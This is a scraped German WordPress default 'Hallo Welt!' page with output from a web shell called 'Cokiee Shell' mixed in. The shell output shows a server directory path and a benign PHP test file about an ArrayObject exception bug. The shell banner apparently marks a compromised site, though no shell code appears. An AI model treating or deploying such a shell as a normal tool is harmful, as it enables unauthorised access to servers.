Willkommen bei WordPress. Dies ist dein erster Beitrag. Bearbeite oder lösche ihn und beginne mit dem Schreiben!
Hallo Welt!
von raredesign | Dez 3, 2019 | Allgemein | 0 Kommentare
Cokiee Shell
Current Path : /usr/local/src/php7/php-7.0.5/ext/spl/tests/ |
Current File : //usr/local/src/php7/php-7.0.5/ext/spl/tests/bug36825.phpt |
--TEST-- Bug #36825 (Exceptions thrown in ArrayObject::offsetGet cause segfault) --FILE-- <?php class foo extends ArrayObject { public function offsetGet($key) { echo __METHOD__ . "($key)\n"; throw new Exception("hi"); } } $test = new foo(); try { var_dump($test['bar']); } catch (Exception $e) { echo "got exception\n"; } ?> ===DONE=== --EXPECT-- foo::offsetGet(bar) got exception ===DONE===
Cokiee Shell Web 1.0, Coded By Razor
Neueste Kommentare